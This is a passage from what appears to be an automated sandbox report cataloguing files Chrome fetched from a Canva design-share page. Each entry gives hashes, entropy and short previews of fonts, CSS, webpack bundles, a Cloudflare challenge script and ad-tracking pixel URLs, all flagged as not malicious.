                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 201132, version 1.15139
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):201132
                                                                                                                                                                                                                                                    Entropy (8bit):7.998833459123063
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:6144:Km/vYXMmxVh7iOE49yPV7WQJLgz8AUJefwEuriA:KiY8mxV409yPViuLgz8yRuJ
                                                                                                                                                                                                                                                    MD5:1DA7B78B095470252A023E5943D6BFEE
                                                                                                                                                                                                                                                    SHA1:826268DEC35CBDB1C1D750F8578CFDAD5E34CA15
                                                                                                                                                                                                                                                    SHA-256:8AF7572662B43186FF6CECD57BE6C89AF823350C12D790DFD0EF1458C2F62996
                                                                                                                                                                                                                                                    SHA-512:9D6AD16AFAC668DB116F011BCFDA4E8E01EA66BD63B8F27A89C3B7F90DD120D156EA3CCB495E649FC273350F300D509AFA6CEBA55FE4F51B7AC4EDE96998D0AB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YACgEZ1cb1Q/0/ArimoItalic.fa87472a877e70c5bce22e42be5c.d257a7100844bc3f98c9021168b6249e.woff2
                                                                                                                                                                                                                                                    Preview:wOF2...................<..;#......................j...P..J....`...........4....d...(.6.$..\..(..d. ..c...u...[:...*..j....Y.H...,.$..'..s...PH\...Y...1.`Dik....*G.W/8C..C..<......H...................s...{.3w{[v... ...B...TQ.b..Z.........|H..E.K..lUb...E.h..J+.#.L.....B.m....*.....t...DG;...A.!q.cx....N...&k...U......`.N....43.=..~.+.{_.OL...Y2.....w..vX.-.W.~../P.....6..I.f......o9.........}...+Q..W.e^.W...r.qu>=......I.....$...y..8.....&..B.|....JU....Q..:Q.8.....'~c.~.(...7om..3...M..j-.s.9.l.1....^.k.....wua"V.f.Qc.Q9m.2.....B...^.fy.......+.3.%.w5Rl..j.6l.._a?..m.h.v$.~...=L.......h...cw.^e...p.C...Y..h.A..1.C.Y...:N+V...cs?'..[t....+H..;...8^.'...o.....$...g..9e...D..;07.Qe..x$.t.i..]wg.jk....YT..K9.<.m<.'..$i...+..<D........(....).|..Y.S..=.PbM.]..S.A3*T.P!C..NSZD...%.u.ZZ...*....z...@`..~....3.`e/.0(%.w.......S..E.H...rM..%..T...o..n|..8.rCI.uoIv...3.J.....r.Q...t........\.Y.,...u.b..-A....?...<.".`......k.&.Z4.e.J.....4-..Mm..1.......Pc.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):548
                                                                                                                                                                                                                                                    Entropy (8bit):4.660801881684815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:TvgsoCVIogs01lI5r8INGlTF5TF5TF5TF5TF5TFK:cEQtnDTPTPTPTPTPTc
                                                                                                                                                                                                                                                    MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                                                                                                                                                                    SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                                                                                                                                                                    SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                                                                                                                                                                    SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8850), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):8850
                                                                                                                                                                                                                                                    Entropy (8bit):5.7394099311289635
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:9g43t6cgzQXFPtptZPPovhfbvY/4UdjV6EgbvCRTo8fmWDjWXf:9g4d+GdPKhfbwVJVFzRTo+DqXf
                                                                                                                                                                                                                                                    MD5:C921CA77F59AC6016662C0B3BE8400D4
                                                                                                                                                                                                                                                    SHA1:929380ED841A590076793DD752AFD663571F5105
                                                                                                                                                                                                                                                    SHA-256:C19BB563AEBD079E25CDD6DF143380C66434A3FA7832CD1F9FB0B82A000A5609
                                                                                                                                                                                                                                                    SHA-512:2ED10EC3F005413826AEF7276A85E8540BEF0D1542A5D2637A018FE01FFEE243175BAD08744D80B1847C8BD39264CB72A671BCC6B2A32758F5E66DE0779D143C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://www.canva.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?
                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=parseInt(V(434))/1*(parseInt(V(436))/2)+-parseInt(V(402))/3*(parseInt(V(407))/4)+parseInt(V(394))/5*(parseInt(V(384))/6)+-parseInt(V(349))/7+parseInt(V(432))/8*(-parseInt(V(358))/9)+-parseInt(V(416))/10*(parseInt(V(389))/11)+-parseInt(V(379))/12*(-parseInt(V(412))/13),e===g)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,176022),h=this||self,i=h[W(361)],j={},j[W(399)]='o',j[W(357)]='s',j[W(326)]='u',j[W(332)]='z',j[W(439)]='n',j[W(424)]='I',j[W(373)]='b',k=j,h[W(444)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,null===E||E===void 0)return G;for(I=n(E),g[a1(354)][a1(409)]&&(I=I[a1(446)](g[a1(354)][a1(409)](E))),I=g[a1(324)][a1(343)]&&g[a1(437)]?g[a1(324)][a1(343)](new g[(a1(437))](I)):function(O,a2,P){for(a2=a1,O[a2(428)](),P=0;P<O[a2(433)];O[P+1]===O[P]?O[a2(356)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(355)][a1(366)](J),K=0;K<I[a1(433)];L=I[K],M=m(g,E
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3212)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):3275
                                                                                                                                                                                                                                                    Entropy (8bit):5.569482483327627
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:RcYRtpPXiFzwqlpYyE7yDf78HmUw0/2OMMv3Ja13/qCeL7CuzHgxVSL:1tpPSNwceHIf7umUwmMMv3JaAp7XoU
                                                                                                                                                                                                                                                    MD5:B3F15060196A297281486E58A2FEDDC4
                                                                                                                                                                                                                                                    SHA1:BEF94F457B64B4DED9835C118653E704563EB581
                                                                                                                                                                                                                                                    SHA-256:B0715C48D5E84B45FA79A0C873D5C459D7705EBEE5562DA2CC05FE6931545D0F
                                                                                                                                                                                                                                                    SHA-512:07B5B1A2D45E4DE4E3295B6920EB5D0297252DFBD678EE4CFB6A5E733A38092C022A9B4E1DD5B396BD94F9A872F4DDA3B37D90C713CBA2CAA5AFBDAAD85B061C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/2c8d424892fc6ce6.ltr.css
                                                                                                                                                                                                                                                    Preview:.VaW8_A{border-radius:9999px}.VaW8_A.cUFFRA{border-radius:4px}.yCT70Q{r:50%}.yCT70Q._2LVP_g{r:calc(50% - 1px);stroke-width:2px;paint-order:fill}.cUFFRA{border-radius:4px}.cUFFRA._2LVP_g{x:1px;y:1px;rx:calc((var(--__ULgQ) - 2px)*.1);ry:calc((var(--__ULgQ) - 2px)*.1);stroke-width:2px;height:calc(var(--__ULgQ) - 2px);paint-order:fill;width:calc(var(--__ULgQ) - 2px)}.light{--FzoXNQ:#f0f1f5}.dark{--FzoXNQ:#252627}.n8XGZg{background:transparent 50%/cover no-repeat;background-clip:content-box;background-color:var(--FzoXNQ);border-radius:9999px;box-sizing:border-box;display:block;font-family:Canva Sans,Noto Sans Variable,Noto Sans,-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif;overflow:hidden}.n8XGZg.P3N3Pw{border-radius:4px}.JwH6AA{border:2px solid transparent}.QJpRHw{box-shadow:inset 0 0 0 1px var(--OuCkCQ)}._4C1vIA>.YL_ApQ,._4C1vIA>.qqCHKg{transition:opacity .3s ease-in-out}.gWeP3g,.qqCHKg{opacity:0}.YL_ApQ{opacity:1}.pOll6Q>.gum40Q{display:none}.g1T5pQ>.gum40Q{visibil
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                    Entropy (8bit):5.2128423807550925
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:kjhskjmRcmnwf0Hz0oW0+NNJ1kOldlJVrK22:kjhskjmWmwsHAoW0gFkOhJlK22
                                                                                                                                                                                                                                                    MD5:CDA459F2F4321C68CEA3296F0945C472
                                                                                                                                                                                                                                                    SHA1:13736CB2FBCF52C840AAB8D9E13A7AEAA22CE7B5
                                                                                                                                                                                                                                                    SHA-256:FFCC7299996CC445BD214A8DE1F108A74D6733F564BB27B194F6DA62216BAE5D
                                                                                                                                                                                                                                                    SHA-512:6B6BBF77F86BB2A0F890C253D6F61DBD734061495E0076659EBEF7EB61FA6D41D53B2FDFDF2CE160851CA24048A8B9614A0B7DA7213E51D0BFC6A415DC1E17B5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7620],{../***/ 688165:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {.}).call(self, self._fe4d99ebe0d2d259646a80d250150d47);}..}])
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2139)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):44810
                                                                                                                                                                                                                                                    Entropy (8bit):5.511402953964193
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:CEhAiTH6cmfcljC7OWOtrk4MtLQbK5PPrAMFi+ugkoJ2TyDTLDrjynIPGV3pULtu:+iTH3+wNrRMtLQbuPPrAMFingkoJLtHO
                                                                                                                                                                                                                                                    MD5:99252E478B7202700B285066EE7024CC
                                                                                                                                                                                                                                                    SHA1:3BA071E13110A035C8327095A682980E39D9B465
                                                                                                                                                                                                                                                    SHA-256:34566AFB6B84A2E67505C71CDA39DE74E6E844E927BCE558302CEA61240B577D
                                                                                                                                                                                                                                                    SHA-512:F6765B5D9F83C9D42C52606CC0EA46B90C9C142B9E123BDA927F124ACEBA7D98D69758DF5F436E8638DAABA26F8FEE101A34083E2A4273187F7073C5A13AC005
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/18db09b659c42845.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1425],{../***/ 38406:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var oJ=__c.oJ;var Ac=__c.Ac;var L=__c.L;var vJ=__c.vJ;var jf=__c.jf;var A=__c.A;var We=__c.We;var B=__c.B;var Eb=__c.Eb;var Ut=__c.Ut;.var h7=function(){const [a]=(0,__c.Vb)(()=>Ut());return a},i7=function(a,b,c){if(a===b)return!0;if(a.size!==b.size)return!1;a=a[Symbol.iterator]();b=b[Symbol.iterator]();for(var d=a.next(),e=b.next();!d.done&&!e.done;){d=d.value;e=e.value;if(c?!c(d,e):d!==e)return!1;d=a.next();e=b.next()}return!0},YAb=function(a){switch(a){case 4:return Eb("9ND0kg");case 2:return Eb("ibdecg");case 7:return Eb("446quA");case 5:return Eb("j1fbqg");case 1:return Eb("O5i4AQ");case 6:return Eb("C0VHsg");case 3:return Eb("+IXmVg");.d
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://adservice.google.com/ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1435612
                                                                                                                                                                                                                                                    Entropy (8bit):5.624486605961852
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:jXgpO95uOTk+gcn/VlyWw4vnHM3TmhfO7qv5AAzEV0a8EjtiFUTNEpv7XZx5qIK6:7D95uOTk+gcnNlyBKnHM3TmhfO7qv5AW
                                                                                                                                                                                                                                                    MD5:CAA1ECECE273993811877D1207762A37
                                                                                                                                                                                                                                                    SHA1:26CF34C793B87D38431C6ABBEEA18B878ECC4ABF
                                                                                                                                                                                                                                                    SHA-256:F6D37B4CCEE10BB3B4F1024188E43D5BEFED2450052602DDA0E06A66AB653E64
                                                                                                                                                                                                                                                    SHA-512:5856EB3FCF3C28846ECA2F6ECBC247C5D08C2C1238135778D409589A2EAECB9D25A0B02E692FCD6C9C1B27685A62D51D75FD038E6C07294726538F19332CDA21
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var jM;var rJ;var EW;var hW;var gW;var YV;var Sy;var BU;var uU;var rU;var xU;var uu;var Ut;var Yt;var Va;var IT;var KO;var ba;var gP;var LO;var MO;var CO;var IO;var FO;var HO;var E;var DO;var T;var Qa;var hb;var Ra;var AO;var BO;var EO;var S;var C;var JO;var Ua;var Ta;var U;var G;var ib;var OM;var Ee;var EM;var Ce;var oK;var Cs;var xJ;var Bu;var Vh;var tC;var KG;var ys;var rE;var nb;var YD;var Ox;var gx;var ek;var L;var Ac;var oC;var vk;var GA;var xB;var Rs;var Fc;var ms;var Ks;var Ms;var sy;var ry;.var oy;var jy;var jw;var Eb;var vv;var tv;var sv;var hv;var Ou;var Hu;var wu;var
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3922)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17168
                                                                                                                                                                                                                                                    Entropy (8bit):5.681193136051718
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:RRJ8bUu3/OfhCZAKA/ZtDiPlvDqoxFxkR/X/l2DUK8G7+2Zmgf/3+s2A:Rp6/OfhCOrDi9brwR/dbK8Pgf/3+K
                                                                                                                                                                                                                                                    MD5:877FA88BFB6FE3A883ACE013E852F98C
                                                                                                                                                                                                                                                    SHA1:DC8D514AB4C602EC01BE5DD594B4095F8E6B4563
                                                                                                                                                                                                                                                    SHA-256:D0D29E3CF523987084CAD977662B11C5B2205B798298A25A9BBF4D513A68386A
                                                                                                                                                                                                                                                    SHA-512:C087281FF18AF9F9A52DFC3056F24B337B3B44E660AC71DC3D8F47B13602BDBC56F851A3FB77B5E9AC76E6E82A701AD59420D14727D21713780AF768C2E8ED73
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[495],{../***/ 665054:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(577033);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var B=__c.B;var L=__c.L;.var Ozb=function(a,b){class c{static B(d){L(d,{Ud:V6,m0:V6})}get Ud(){switch(this.m0){case "date":return new Kzb(this.Lt,b.language||"en-AU");case "select":return new Lzb(this.Lt);case "mention":return new Mzb(this.Lt);case "plain_number":case "currency":case "percentage":case void 0:break;default:throw new B(this.m0);}}get m0(){var d;return null===(d=this.Lt.Yt)||void 0===d?void 0:d.type}constructor(d){c.B(this);this.context=d;this.Lt=__c.A(a.Lw(d.sheet,d.ba,d.col))}}return Nzb(d=>(new c(d)).Ud)},.Pzb=function(a){var b=["rgb(255, 255, 255)","rgb(13, 18, 22)"];try{const c=__c.Cy(a),d=c instanceof __
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (955)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1959
                                                                                                                                                                                                                                                    Entropy (8bit):5.470740093954029
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:ja8bRSowcqSJXgtG9toEOwcqSJXICa7RSowcqSJXgtG9toEOwcqSJXIUdR5:+8bRSiTXmEQTXm7RSiTXmEQTXt5
                                                                                                                                                                                                                                                    MD5:92D5EE8BD79F0EE7E170B6F5EB177B44
                                                                                                                                                                                                                                                    SHA1:31E4D8A3255580BF176DBDFB65A8E84790759586
                                                                                                                                                                                                                                                    SHA-256:F18FBF1464A581B15205B7A068D71E3CEC9240B6A96B4C3FBD2050347CCE60DA
                                                                                                                                                                                                                                                    SHA-512:1F4D973E9037F06F14A36FE01EE1505219545541BE8A81B5B0DB80104968D514841E0785BFC891EEDFFEE6264DEF8AEAE6DF507487D060C3DFEC5D1BF86F6520
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=1815694816;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=365895288;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):370795
                                                                                                                                                                                                                                                    Entropy (8bit):5.311372490047287
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:dzFlje4awAiQ4sFgxA0li4QSfFJAKhIUVr8Q61xw4e1:AWIUVr81xw4e1
                                                                                                                                                                                                                                                    MD5:74C9DEB0CFD613EBF0B30CB5899FBC72
                                                                                                                                                                                                                                                    SHA1:B5C2E7D1D4EA7A1EDBC4F38841904C2BEEBE60C0
                                                                                                                                                                                                                                                    SHA-256:E5834A980D53695EFCD0EBF5BDE122E73AB6C6352B337C84579920B5D37F72E5
                                                                                                                                                                                                                                                    SHA-512:7A6FE44AEE532D11727609EEE9BF8630CC72ADEF881769E789CF51DF5EF4BB2928EABBED2356343FE512ACB8C72923878B8874AC7198A14317502DEC472D89A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:/*! For license information please see a539f22cb4b4cc9e.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{968:t=>{var e;window,e=function(){return function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(r,o,function(e){return t[e]}.bind(null,o));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){ret
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1581)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):11354
                                                                                                                                                                                                                                                    Entropy (8bit):5.56153050425984
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:gQdJBEtxmqex0GygMrU2ePKgnYICPb3ReLWSrwL7PdYW8ZKAwhT5T2U88qmn79G1:gQdJBEtI0GFh2ePmFrMXrw/lMoAqT5TW
                                                                                                                                                                                                                                                    MD5:A5CBEFA28174BDEA24CCA2D8CC328244
                                                                                                                                                                                                                                                    SHA1:1F246F3718330E8395C4D62FF581FCBF10AB56C1
                                                                                                                                                                                                                                                    SHA-256:76A289AB009F7348AAC8AE32A595036AB6DFCAC77E844DCF4967F689636F61A6
                                                                                                                                                                                                                                                    SHA-512:F75508ED591CFC836C837631FB0CE9A6DBAB58ACD17CAA8781CCC4DD0724C9C98BBE6461D7F57F51E0DE70FC183F53F04B2FEFCECDF17EC8680C2A9FB91C2F43
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/ed3781c5c1cc0c75.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8919],{../***/ 653425:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(153325);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var H1;var C1,teb,D1,ueb,E1,web,veb,xeb,F1,G1,zeb,I1;C1=function(a){const b={};for(const c of Object.keys(a)){const d=a[c];b[c]=d instanceof Object?JSON.stringify(d):d}console.table(b);console.log("View non-truncated properties:");console.dir(a)};.teb=function(a){var b;const c=[],d=e=>{var f,g;c.push(...e.G);e.To&&c.push(...e.To);e.$i&&c.push(...e.$i);e.qq&&c.push(...e.qq);null===(f=e.Cq)||void 0===f?void 0:f.forEach(h=>c.push(...h));null===(g=e.Df)||void 0===g?void 0:g.forEach(h=>c.push(...h))};d(a);a.children&&a.children.forEach(e=>d(e));null===(b=a.Xp)||void 0===b?void 0:b.forEach(e=>c.push(...e));return c};D1=function(
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18662)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):18726
                                                                                                                                                                                                                                                    Entropy (8bit):5.445341107297658
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:LhrTLnyE8b133gsNkiI8KxypGt591Rt/W7agr0/+K8rdrL/6WCk6n20Wpa/I4v:1r/qbZQs+iIHxAGn91Rt+eo0y5XCWCk8
                                                                                                                                                                                                                                                    MD5:317DB91658FDE2A75EF62DE7A2BE822C
                                                                                                                                                                                                                                                    SHA1:81B009EEFC846FE579A556F4032D0BBDC92AD4C1
                                                                                                                                                                                                                                                    SHA-256:4CCF924C756CD3FD697EC71CBA2451BC00591529A14B226E47B67BFE4544DC5D
                                                                                                                                                                                                                                                    SHA-512:E04B2E327D3A50964AC56DC00E4274A0ABDBA19A3D54EEA01B9DAB78CAD7224E5030EFDB816804DE3CEBB54A653C42D048AF41EDFEFCD833250DC557E227EEE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/4b29606fa142efca.runtime.js
